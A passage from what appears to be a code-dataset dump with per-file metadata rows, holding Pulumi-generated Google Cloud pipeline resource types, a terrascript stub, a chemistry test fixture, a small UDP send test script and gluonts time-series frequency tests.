Parameters facilitate setting and delivering data into the pipeline's execution environment. They are defined at create time, with optional defaults, and can be overridden at run time. If `localCopy` is unset, then the parameter specifies a string that is passed as-is into the pipeline, as the value of the environment variable with the given name. A default value can be optionally specified at create time. The default can be overridden at run time using the inputs map. If no default is given, a value must be supplied at runtime. If `localCopy` is defined, then the parameter specifies a data source or sink, both in Google Cloud Storage and on the Docker container where the pipeline computation is run. The service account associated with the Pipeline (by default the project's Compute Engine service account) must have access to the Google Cloud Storage paths. At run time, the Google Cloud Storage paths can be overridden if a default was provided at create time, or must be set otherwise. The pipeline runner should add a key/value pair to either the inputs or outputs map. The indicated data copies will be carried out before/after pipeline execution, just as if the corresponding arguments were provided to `gsutil cp`. For example: Given the following `PipelineParameter`, specified in the `inputParameters` list: ``` {name: "input_file", localCopy: {path: "file.txt", disk: "pd1"}} ``` where `disk` is defined in the `PipelineResources` object as: ``` {name: "pd1", mountPoint: "/mnt/disk/"} ``` We create a disk named `pd1`, mount it on the host VM, and map `/mnt/pd1` to `/mnt/disk` in the docker container. At runtime, an entry for `input_file` would be required in the inputs map, such as: ``` inputs["input_file"] = "gs://my-bucket/bar.txt" ``` This would generate the following gsutil call: ``` gsutil cp gs://my-bucket/bar.txt /mnt/pd1/file.txt ``` The file `/mnt/pd1/file.txt` maps to `/mnt/disk/file.txt` in the Docker container. Acceptable paths are: Google Cloud storage pathLocal path file file glob directory For outputs, the direction of the copy is reversed: ``` gsutil cp /mnt/disk/file.txt gs://my-bucket/bar.txt ``` Acceptable paths are: Local pathGoogle Cloud Storage path file file file directory - directory must already exist glob directory - directory will be created if it doesn't exist One restriction due to docker limitations, is that for outputs that are found on the boot disk, the local path cannot be a glob and must be a file.
:param str default_value: The default value for this parameter. Can be overridden at runtime. If `localCopy` is present, then this must be a Google Cloud Storage path beginning with `gs://`.
:param str description: Human-readable description.
:param 'LocalCopyResponse' local_copy: If present, this parameter is marked for copying to and from the VM. `LocalCopy` indicates where on the VM the file should be. The value given to this parameter (either at runtime or using `defaultValue`) must be the remote path where the file should be.
:param str name: Name of the parameter - the pipeline runner uses this string as the key to the input and output maps in RunPipeline.
"""
pulumi.set(__self__, "default_value", default_value)
pulumi.set(__self__, "description", description)
pulumi.set(__self__, "local_copy", local_copy)
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="defaultValue")
def default_value(self) -> str:
"""
The default value for this parameter. Can be overridden at runtime. If `localCopy` is present, then this must be a Google Cloud Storage path beginning with `gs://`.
"""
return pulumi.get(self, "default_value")
@property
@pulumi.getter
def description(self) -> str:
"""
Human-readable description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="localCopy")
def local_copy(self) -> 'outputs.LocalCopyResponse':
"""
If present, this parameter is marked for copying to and from the VM. `LocalCopy` indicates where on the VM the file should be. The value given to this parameter (either at runtime or using `defaultValue`) must be the remote path where the file should be.
"""
return pulumi.get(self, "local_copy")
@property
@pulumi.getter
def name(self) -> str:
"""
Name of the parameter - the pipeline runner uses this string as the key to the input and output maps in RunPipeline.
"""
return pulumi.get(self, "name")
@pulumi.output_type
class PipelineResourcesResponse(dict):
"""
The system resources for the pipeline run.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "acceleratorCount":
suggest = "accelerator_count"
elif key == "acceleratorType":
suggest = "accelerator_type"
elif key == "bootDiskSizeGb":
suggest = "boot_disk_size_gb"
elif key == "minimumCpuCores":
suggest = "minimum_cpu_cores"
elif key == "minimumRamGb":
suggest = "minimum_ram_gb"
elif key == "noAddress":
suggest = "no_address"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PipelineResourcesResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PipelineResourcesResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PipelineResourcesResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
accelerator_count: str,
accelerator_type: str,
boot_disk_size_gb: int,
disks: Sequence['outputs.DiskResponse'],
minimum_cpu_cores: int,
minimum_ram_gb: float,
no_address: bool,
preemptible: bool,
zones: Sequence[str]):
"""
The system resources for the pipeline run.
:param str accelerator_count: Optional. The number of accelerators of the specified type to attach. By specifying this parameter, you will download and install the following third-party software onto your managed Compute Engine instances: NVIDIA® Tesla® drivers and NVIDIA® CUDA toolkit.
:param str accelerator_type: Optional. The Compute Engine defined accelerator type. By specifying this parameter, you will download and install the following third-party software onto your managed Compute Engine instances: NVIDIA® Tesla® drivers and NVIDIA® CUDA toolkit. Please see https://cloud.google.com/compute/docs/gpus/ for a list of available accelerator types.
:param int boot_disk_size_gb: The size of the boot disk. Defaults to 10 (GB).
:param Sequence['DiskResponse'] disks: Disks to attach.
:param int minimum_cpu_cores: The minimum number of cores to use. Defaults to 1.
:param float minimum_ram_gb: The minimum amount of RAM to use. Defaults to 3.75 (GB)
:param bool no_address: Whether to assign an external IP to the instance. This is an experimental feature that may go away. Defaults to false. Corresponds to `--no_address` flag for [gcloud compute instances create] (https://cloud.google.com/sdk/gcloud/reference/compute/instances/create). In order to use this, must be true for both create time and run time. Cannot be true at run time if false at create time. If you need to ssh into a private IP VM for debugging, you can ssh to a public VM and then ssh into the private VM's Internal IP. If noAddress is set, this pipeline run may only load docker images from Google Container Registry and not Docker Hub. Before using this, you must [configure access to Google services from internal IPs](https://cloud.google.com/compute/docs/configure-private-google-access#configuring_access_to_google_services_from_internal_ips).
:param bool preemptible: Whether to use preemptible VMs. Defaults to `false`. In order to use this, must be true for both create time and run time. Cannot be true at run time if false at create time.
:param Sequence[str] zones: List of Google Compute Engine availability zones to which resource creation will restricted. If empty, any zone may be chosen.
"""
pulumi.set(__self__, "accelerator_count", accelerator_count)
pulumi.set(__self__, "accelerator_type", accelerator_type)
pulumi.set(__self__, "boot_disk_size_gb", boot_disk_size_gb)
pulumi.set(__self__, "disks", disks)
pulumi.set(__self__, "minimum_cpu_cores", minimum_cpu_cores)
pulumi.set(__self__, "minimum_ram_gb", minimum_ram_gb)
pulumi.set(__self__, "no_address", no_address)
pulumi.set(__self__, "preemptible", preemptible)
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="acceleratorCount")
def accelerator_count(self) -> str:
"""
Optional. The number of accelerators of the specified type to attach. By specifying this parameter, you will download and install the following third-party software onto your managed Compute Engine instances: NVIDIA® Tesla® drivers and NVIDIA® CUDA toolkit.
"""
return pulumi.get(self, "accelerator_count")
@property
@pulumi.getter(name="acceleratorType")
def accelerator_type(self) -> str:
"""
Optional. The Compute Engine defined accelerator type. By specifying this parameter, you will download and install the following third-party software onto your managed Compute Engine instances: NVIDIA® Tesla® drivers and NVIDIA® CUDA toolkit. Please see https://cloud.google.com/compute/docs/gpus/ for a list of available accelerator types.
"""
return pulumi.get(self, "accelerator_type")
@property
@pulumi.getter(name="bootDiskSizeGb")
def boot_disk_size_gb(self) -> int:
"""
The size of the boot disk. Defaults to 10 (GB).
"""
return pulumi.get(self, "boot_disk_size_gb")
@property
@pulumi.getter
def disks(self) -> Sequence['outputs.DiskResponse']:
"""
Disks to attach.
"""
return pulumi.get(self, "disks")
@property
@pulumi.getter(name="minimumCpuCores")
def minimum_cpu_cores(self) -> int:
"""
The minimum number of cores to use. Defaults to 1.
"""
return pulumi.get(self, "minimum_cpu_cores")
@property
@pulumi.getter(name="minimumRamGb")
def minimum_ram_gb(self) -> float:
"""
The minimum amount of RAM to use. Defaults to 3.75 (GB)
"""
return pulumi.get(self, "minimum_ram_gb")
@property
@pulumi.getter(name="noAddress")
def no_address(self) -> bool:
"""
Whether to assign an external IP to the instance. This is an experimental feature that may go away. Defaults to false. Corresponds to `--no_address` flag for [gcloud compute instances create] (https://cloud.google.com/sdk/gcloud/reference/compute/instances/create). In order to use this, must be true for both create time and run time. Cannot be true at run time if false at create time. If you need to ssh into a private IP VM for debugging, you can ssh to a public VM and then ssh into the private VM's Internal IP. If noAddress is set, this pipeline run may only load docker images from Google Container Registry and not Docker Hub. Before using this, you must [configure access to Google services from internal IPs](https://cloud.google.com/compute/docs/configure-private-google-access#configuring_access_to_google_services_from_internal_ips).
"""
return pulumi.get(self, "no_address")
@property
@pulumi.getter
def preemptible(self) -> bool:
"""
Whether to use preemptible VMs. Defaults to `false`. In order to use this, must be true for both create time and run time. Cannot be true at run time if false at create time.
"""
return pulumi.get(self, "preemptible")
@property
@pulumi.getter
def zones(self) -> Sequence[str]:
"""
List of Google Compute Engine availability zones to which resource creation will restricted. If empty, any zone may be chosen.
"""
return pulumi.get(self, "zones")
| 59.331719 | 2,480 | 0.687398 | 3,422 | 24,504 | 4.823787 | 0.113676 | 0.01145 | 0.018114 | 0.026474 | 0.773308 | 0.747077 | 0.740534 | 0.711698 | 0.710123 | 0.710123 | 0 | 0.00248 | 0.226657 | 24,504 | 412 | 2,481 | 59.475728 | 0.867968 | 0.598719 | 0 | 0.382979 | 1 | 0.017021 | 0.16493 | 0.022073 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170213 | false | 0 | 0.029787 | 0 | 0.353191 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6dc6c1887b92ab53df1e1d382428aadcc9f47984 | 376 | py | Python | terrascript/resource/fastly.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | terrascript/resource/fastly.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | terrascript/resource/fastly.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # terrascript/resource/fastly.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:16:17 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.resource.fastly
#
# instead of
#
# >>> import terrascript.resource.fastly.fastly
#
# This is only available for 'official' and 'partner' providers.
from terrascript.resource.fastly.fastly import *
| 25.066667 | 73 | 0.742021 | 49 | 376 | 5.693878 | 0.693878 | 0.272401 | 0.358423 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036923 | 0.135638 | 376 | 14 | 74 | 26.857143 | 0.821538 | 0.800532 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
6df5deb42adc4d7afd977cc0be95c11b8fd4486e | 2,918 | py | Python | tests/molecular/molecules/molecule/fixtures/cage/metal_topologies/m6l2l3_prism.py | andrewtarzia/stk | 1ac2ecbb5c9940fe49ce04cbf5603fd7538c475a | [
"MIT"
] | 21 | 2018-04-12T16:25:24.000Z | 2022-02-14T23:05:43.000Z | tests/molecular/molecules/molecule/fixtures/cage/metal_topologies/m6l2l3_prism.py | JelfsMaterialsGroup/stk | 0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2 | [
"MIT"
] | 8 | 2019-03-19T12:36:36.000Z | 2020-11-11T12:46:00.000Z | tests/molecular/molecules/molecule/fixtures/cage/metal_topologies/m6l2l3_prism.py | supramolecular-toolkit/stk | 0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2 | [
"MIT"
] | 5 | 2018-08-07T13:00:16.000Z | 2021-11-01T00:55:10.000Z | import pytest
import stk
from ...building_blocks import (
get_tetratopic_linker,
get_tritopic_linker,
get_iron_complex,
)
from ....case_data import CaseData
@pytest.fixture(
scope='session',
params=(
lambda name: CaseData(
molecule=stk.ConstructedMolecule(
topology_graph=stk.cage.M6L2L3Prism(
building_blocks={
get_iron_complex(): range(6),
get_tritopic_linker(): range(6, 8),
get_tetratopic_linker(): range(8, 11),
},
),
),
smiles=(
'[H]C1=C([H])C([H])=N2->[Fe+2]3456<-N7=C([H])C([H])=C('
'[H])C([H])=C7C([H])=N->3C3=C([H])C([H])=C(C([H])=C3[H'
'])C3([H])C7=C([H])C([H])=C(C([H])=C7[H])N7->[Fe+2]89%'
'10(<-N%11=C([H])C([H])=C([H])C([H])=C%11C([H])=N->8C8'
'=C([H])C([H])=C(C([H])=C8[H])N(C8=C([H])C([H])=C(C([H'
'])=C8[H])N->4=C([H])C2=C1[H])C1=C([H])C([H])=C(C([H])'
'=C1[H])N1->[Fe+2]248(<-N%11=C([H])C([H])=C([H])C([H])'
'=C%11C=1[H])<-N1=C([H])C([H])=C([H])C([H])=C1C([H])=N'
'->2C1=C([H])C([H])=C(C([H])=C1[H])C([H])(C1=C([H])C(['
'H])=C(C([H])=C1[H])N->5=C([H])C1=C([H])C([H])=C([H])C'
'([H])=N->61)C1([H])C2=C([H])C([H])=C(C([H])=C2[H])N2-'
'>[Fe+2]56%11(<-N%12=C([H])C([H])=C([H])C([H])=C%12C(['
'H])=N->5C5=C([H])C([H])=C(C([H])=C5[H])N5C%12=C([H])C'
'([H])=C(C([H])=C%12[H])N%12->[Fe+2]%13%14(<-N%15=C([H'
'])C([H])=C([H])C([H])=C%15C=%12[H])(<-N%12=C([H])C([H'
'])=C([H])C([H])=C%12C([H])=N->%13C%12=C([H])C([H])=C('
'C([H])=C%12[H])C3([H])C3=C([H])C([H])=C(C([H])=C3[H])'
'N3->[Fe+2]%12%13(<-N%15=C([H])C([H])=C([H])C([H])=C%1'
'5C([H])=N->%12C%12=C([H])C([H])=C5C([H])=C%12[H])(<-N'
'5=C([H])C([H])=C([H])C([H])=C5C=3[H])<-N3=C([H])C([H]'
')=C([H])C([H])=C3C([H])=N->%13C3=C([H])C([H])=C(C([H]'
')=C3[H])C([H])(C3=C([H])C([H])=C(C([H])=C3[H])N->9=C('
'[H])C3=C([H])C([H])=C([H])C([H])=N->%103)C([H])(C3=C('
'[H])C([H])=C(C([H])=C3[H])N->4=C([H])C3=C([H])C([H])='
'C([H])C([H])=N->83)C3=C([H])C([H])=C(C([H])=C3[H])N->'
'6=C([H])C3=C([H])C([H])=C([H])C([H])=N->%113)<-N3=C(['
'H])C([H])=C([H])C([H])=C3C([H])=N->%14C3=C([H])C([H])'
'=C1C([H])=C3[H])<-N1=C([H])C([H])=C([H])C([H])=C1C=2['
'H])<-N1=C([H])C([H])=C([H])C([H])=C1C=7[H]'
),
name=name,
),
),
)
def metal_cage_m6l2l3_prism(request) -> CaseData:
return request.param(
f'{request.fixturename}{request.param_index}',
)
| 45.59375 | 71 | 0.357779 | 545 | 2,918 | 1.878899 | 0.168807 | 0.253906 | 0.275391 | 0.273438 | 0.441406 | 0.416016 | 0.400391 | 0.379883 | 0.359375 | 0.321289 | 0 | 0.082386 | 0.276217 | 2,918 | 63 | 72 | 46.31746 | 0.402462 | 0 | 0 | 0.083333 | 0 | 0.483333 | 0.539753 | 0.537354 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016667 | false | 0 | 0.066667 | 0.016667 | 0.1 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
097c277949b6bbccbd4cb01538a8595089f99776 | 114 | py | Python | Libraries_and_Files/importing_05.py | ItaySharabi/LearnPython | 6b91e5143fbe5e44bdeeec671726ee6895890730 | [
"MIT"
] | 2 | 2022-02-16T21:41:45.000Z | 2022-03-01T12:39:56.000Z | Libraries_and_Files/importing_05.py | ItaySharabi/LearnPython | 6b91e5143fbe5e44bdeeec671726ee6895890730 | [
"MIT"
] | null | null | null | Libraries_and_Files/importing_05.py | ItaySharabi/LearnPython | 6b91e5143fbe5e44bdeeec671726ee6895890730 | [
"MIT"
] | null | null | null | # import my_lib as lib
#
# print(f'Time: {lib.current_time()}')
# from my_lib import *
# import my_lib as lib
| 11.4 | 38 | 0.657895 | 20 | 114 | 3.55 | 0.45 | 0.211268 | 0.309859 | 0.366197 | 0.450704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.201754 | 114 | 9 | 39 | 12.666667 | 0.78022 | 0.868421 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1100c62cac2d325fe5f10a2a90709abea5d02570 | 1,969 | py | Python | Tools/Shell/send_test.py | chenxull/UDP_Project | 2490ee11dea3f0a11ff509f59338e510db25d0d9 | [
"MIT"
] | null | null | null | Tools/Shell/send_test.py | chenxull/UDP_Project | 2490ee11dea3f0a11ff509f59338e510db25d0d9 | [
"MIT"
] | null | null | null | Tools/Shell/send_test.py | chenxull/UDP_Project | 2490ee11dea3f0a11ff509f59338e510db25d0d9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding:utf-8
"""send_udp.py"""
# import argparse
import socket
import time
from time import clock
UDP_IP = "172.16.1.1"
UDP_PORT = 8000
MESSAGE = "012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789"
print("UDP target IP:", UDP_IP)
print("UDP target port:", UDP_PORT)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
start = time.monotonic()
for index in range(1, 999, 1):
text = "%03d" % (index)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
input("Press Enter to continue...")
finish = time.monotonic()
print("Duration ", (finish - start))
| 70.321429 | 1,422 | 0.907059 | 88 | 1,969 | 20.193182 | 0.545455 | 0.008441 | 0.015757 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.760638 | 0.045201 | 1,969 | 27 | 1,423 | 72.925926 | 0.184574 | 0.033012 | 0 | 0 | 0 | 0 | 0.788391 | 0.744063 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1875 | 0 | 0.1875 | 0.1875 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
11555bb09dc3964db6a2a8fdb54baa6464da7b3f | 9,461 | py | Python | tests/python/unit/test_frequencies.py | dataiku/dss-plugin-timeseries-forecast | 56980fdab629b5eb27ce4c17e7ba2348c2b2cb28 | [
"Apache-2.0"
] | 11 | 2020-12-21T12:49:26.000Z | 2022-03-11T06:29:49.000Z | tests/python/unit/test_frequencies.py | dataiku/dss-plugin-timeseries-forecast | 56980fdab629b5eb27ce4c17e7ba2348c2b2cb28 | [
"Apache-2.0"
] | 30 | 2020-12-01T18:17:58.000Z | 2022-03-29T21:43:51.000Z | tests/python/unit/test_frequencies.py | dataiku/dss-plugin-timeseries-forecast | 56980fdab629b5eb27ce4c17e7ba2348c2b2cb28 | [
"Apache-2.0"
] | 5 | 2021-02-13T12:18:15.000Z | 2021-09-28T15:55:03.000Z | from gluonts.dataset.common import ListDataset
from gluonts_forecasts.model import Model
from gluonts_forecasts.trained_model import TrainedModel
from dku_constants import TIMESERIES_KEYS
import pandas as pd
import numpy as np
def test_minute_frequency():
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-15 12:40:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "20min"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-01-15 13:00:00")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
frequency=frequency,
prediction_length=prediction_length,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-01-15 13:20:00")
def test_hours_frequency():
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-15 12:00:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "6H"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-01-15 18:00:00")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
prediction_length=prediction_length,
frequency=frequency,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-01-16 00:00:00")
def test_day_frequency():
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-15 00:00:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "3D"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-01-18")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
prediction_length=prediction_length,
frequency=frequency,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-01-21")
def test_business_day_frequency():
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-14 00:00:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "B"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-01-15")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
prediction_length=prediction_length,
frequency=frequency,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-01-18")
def test_week_sunday_frequency():
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-17 00:00:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "W-SUN"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-01-24")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
prediction_length=prediction_length,
frequency=frequency,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-01-31")
def test_week_tuesday_frequency():
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-19 00:00:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "W-TUE"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-01-26")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
prediction_length=prediction_length,
frequency=frequency,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-02-02")
def test_month_frequency():
"""This test covers all month frequencies (quarter=3M, semester=6M, year=12M)"""
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-31 00:00:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "4M"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-05-31")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
prediction_length=prediction_length,
frequency=frequency,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-09-30")
